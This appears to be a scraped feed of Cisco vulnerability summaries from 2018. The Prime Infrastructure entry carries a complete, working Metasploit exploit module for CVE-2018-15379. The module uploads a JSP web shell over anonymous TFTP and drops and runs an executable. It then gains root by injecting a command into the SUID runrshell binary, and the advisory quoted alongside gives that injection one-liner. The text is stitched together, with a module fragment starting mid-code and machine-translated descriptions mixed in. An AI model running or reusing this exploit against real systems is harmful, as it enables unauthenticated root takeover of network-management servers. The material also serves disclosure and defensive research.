A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco Prime Infrastructure is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution with root privileges within the context of the vulnerable application. This issue is being tracked by Cisco Bug ID CSCvk24890. This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions might also be affected, although 3.4.0.0.348 is the latest at the time of writing. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-15379' ], [ 'URL', 'https://seclists.org/fulldisclosure/2018/Oct/19'], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt' ], [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3723' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp' ] ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02', {} ] ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 04 2018' )) register_options( [ OptPort.new('RPORT', [true, 'The target port', 443]), OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]), OptBool.new('SSL', [true, 'Use SSL connection', true]), OptString.new('TARGETURI', [ true, "swimtemp path", '/swimtemp']) ]) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'swimtemp'), 'method' => 'GET' }) unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res.code == 404 && res.body.length == 0 # at the moment this is the best way to detect # a 404 in swimtemp only returns the error code with a body length of 0, # while a 404 to another webapp or to the root returns code plus a body with content return CheckCode::Detected end CheckCode::Safe end def upload_payload(payload) lport = datastore['LPORT'] || (1025 + rand(0xffff-1025)) lhost = datastore['LHOST'] || "0.0.0.0" remote_file = rand_text_alpha(5..16) + '.jsp' tftp_client = Rex::Proto::TFTP::Client.new( "LocalHost" => lhost, "LocalPort" => lport, "PeerHost" => rhost, "PeerPort" => datastore['RPORT_TFTP'], "LocalFile" => "DATA:#{payload}", "RemoteFile" => remote_file, "Mode" => 'octet', "Context" => {'Msf' => self.framework, 'MsfExploit' => self}, "Action" => :upload ) print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'" tftp_client.send_write_request remote_file end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(3..9) var_raw = rand_text_alpha(3..11) var_ostream = rand_text_alpha(3..11) var_pstream = rand_text_alpha(3..11) var_buf = rand_text_alpha(3..11) var_decoder = rand_text_alpha(3..11) var_tmp = rand_text_alpha(3..11) var_path = rand_text_alpha(3..11) var_tmp2 = rand_text_alpha(3..11) var_path2 = rand_text_alpha(3..11) var_proc2 = rand_text_alpha(3..11) var_proc1 = rand_text_alpha(3..11) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(3..11) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2}); | jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh"); String #{var_path2} = #{var_tmp2}.getAbsolutePath(); PrintWriter #{var_pstream} = new PrintWriter(new FileOutputStream(#{var_path2})); #{var_pstream}.println("!#/bin/sh"); #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'"); #{var_pstream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/\n/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, "") jsp = jsp.gsub(/\x0a/, "") return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = upload_payload(jsp_payload) # we land in /opt/CSCOlumos, so we don't know the apache directory # as it changes between versions... so leave this commented for now # ... and try to find a good way to clean it later print_warning "#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos" # register_files_for_cleanup(jsp_name) print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_name), 'method' => 'GET' }) handler end end . >> Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 4/10/2018 / Last updated: 8/10/2018 >> Introduction: From the vendor's website ([1]): "Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users a all from one place. Cisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. Cisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. Cisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructureaready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. Device Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. Large or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control." >> Background and summary: Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution. A Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit's repository in the coming weeks. A special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2]. >> Technical details: #1 Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat CVE-2018-15379 Attack Vector: Remote Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected Most web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-<VERSION>/webapps. One of these applications is "swimtemp", which symlinks to /localdisk/tftp: ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/ total 16 drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -> /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war lrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -> /localdisk/tftp/ drwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacs lrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -> /opt/CSCOlumos/wars/webacs.war As the name implies, this is the directory used by tftp to store files. Cisco has also enabled the upload of files to this directory as tftpd is started with the -c (file create) flag, and it accepts anonymous connections: /usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp The tftpd port is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory. The web shell will then be available at https://<IP>/swimtemp/<SHELL>, and it will execute as the "prime" user, which is an unprivileged user that runs the Apache Tomcat server. #2 Vulnerability: runrshell Command Injection (no specific CVE was attributed to this vulnerability by Cisco; use CVE-2018-15379, same as vulnerability #1) Attack Vector: Local Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected The CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below: int main(int argc, char* argv, char* envp) { char dest; int i; setuid(0); setgid(0); setenv("PATH", "/opt/CSCOlumos/rcmds", 1); memcpy(&dest, "/bin/bash -r -c \"", 0x12uLL); for ( i = 1; argc - 1 >= i; ++i ) { strcat(&dest, argv[i]); strcat(&dest, " "); } strcat(&dest, "\""); return (system(&dest) & 0xFF00) >> 8; } As it can be seen above, the binary uses the system() function to execute: /bin/bash -r -c "<CMD>" ... with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc. However, due to the way system() function calls "bash -c", it is trivial to inject a command by forcing an end quote after <CMD> and the bash operator '&&': [prime@prime34 ~]$ /opt/CSCOlumos/bin/runrshell '" && /usr/bin/whoami #' root >> Fix: Vulnerability #1 has ben fixed fixed with the patch provided by Cisco in [4]. Vulnerability #2 does not appear to have been fixed as of the last update of this advisory. Please note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. >> References: [1] https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html [2] https://blogs.securiteam.com/index.php/archives/3723 [3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_prime_inf_rce.rb [4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>

A vulnerability in the DHCP service of Cisco Industrial Network Director could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper handling of DHCP lease requests. An attacker could exploit this vulnerability by sending malicious DHCP lease requests to an affected application. A successful exploit could allow the attacker to cause the DHCP service to terminate, resulting in a DoS condition. CiscoIndustrialNetworkDirector is a platform that helps IT and operations teams collaborate to fully understand the network and automation devices. This issue is being tracked by Cisco Bug IDs CSCvi90140. The system realizes automatic management through visual operation of industrial Ethernet infrastructure

A vulnerability in the administrative web interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker to execute code with user-level privileges on the underlying operating system. The vulnerability is due to insufficient validation of the content of upgrade packages. An attacker could exploit this vulnerability by uploading a malicious archive to the Upgrade page of the administrative web interface. A successful exploit could allow the attacker to execute code with user-level privileges on the underlying operating system. Multiple Cisco Products are prone to an remote code-execution vulnerability. This issue is being tracked by Cisco Bug ID CSCvi50935

A vulnerability in the web-based interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based interface of the affected software. The vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the web-based interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. Cisco Unity Connection Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCvj50043 and CSCvj50052. Cisco Unity Connection (UC) is a set of voice message platform of Cisco (Cisco). The platform can use voice commands to make calls or listen to messages "hands-free"

A vulnerability in the TCP syslog module of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to exhaust the 1550-byte buffers on an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to a missing boundary check in an internal function. An attacker could exploit this vulnerability by establishing a man-in-the-middle position between an affected device and its configured TCP syslog server and then maliciously modifying the TCP header in segments that are sent from the syslog server to the affected device. A successful exploit could allow the attacker to exhaust buffer on the affected device and cause all TCP-based features to stop functioning, resulting in a DoS condition. The affected TCP-based features include AnyConnect SSL VPN, clientless SSL VPN, and management connections such as Secure Shell (SSH), Telnet, and HTTPS. Multiple Cisco Products are prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition; denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCvh73829

A vulnerability in the per-user-override feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass an access control list (ACL) that is configured for an interface of an affected device. The vulnerability is due to errors that could occur when the affected software constructs and applies per-user-override rules. An attacker could exploit this vulnerability by connecting to a network through an affected device that has a vulnerable configuration. A successful exploit could allow the attacker to access resources that are behind the affected device and would typically be protected by the interface ACL. Remote attackers can exploit this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCvj91858

A vulnerability in the web-based management interface of Cisco Hosted Collaboration Mediation Fulfillment could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected system. The vulnerability is due to insufficient CSRF protections for the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions on an affected system via a web browser and with the privileges of the user. Other attacks are also possible. This issue is being tracked by Cisco Bug IDs CSCvj07142 and CSCvk13368. The software provides functions such as configuring, managing and monitoring services of Cisco HCM-F